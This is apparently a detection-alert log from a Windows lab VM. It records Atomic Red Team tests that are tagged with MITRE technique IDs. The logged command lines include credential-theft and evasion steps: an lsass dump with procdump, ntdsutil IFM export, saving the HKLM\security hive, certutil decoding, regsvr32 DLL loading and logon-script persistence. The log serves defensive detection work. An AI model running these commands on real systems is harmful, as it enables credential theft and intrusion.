MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4063 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.786 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4061 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.223 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4054 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.818 + 747F3D96-D998-5D31-0000-00101BB73900 + 2424 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4053 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.766 + 747F3D96-D998-5D31-0000-001008B43900 + 2000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4052 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:01.940 + 747F3D96-D989-5D31-0000-0010FC7B3900 + 4944 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4049 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:54.968 + 747F3D96-D982-5D31-0000-0010DC633900 + 4240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4048 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.230 + 747F3D96-D97B-5D31-0000-0010F0F03800 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.958 + 747F3D96-DD9E-5D31-0000-00100C3F4B00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.875 + 747F3D96-DD9E-5D31-0000-00106D3A4B00 + 4208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.845 + 747F3D96-DD9E-5D31-0000-001059374B00 + 584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.673 + 747F3D96-DD9E-5D31-0000-00109A2F4B00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4123 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.535 + 747F3D96-DD9E-5D31-0000-0010CB274B00 + 3016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4121 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:23.302 + 747F3D96-DD9B-5D31-0000-00106C1C4B00 + 7164 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 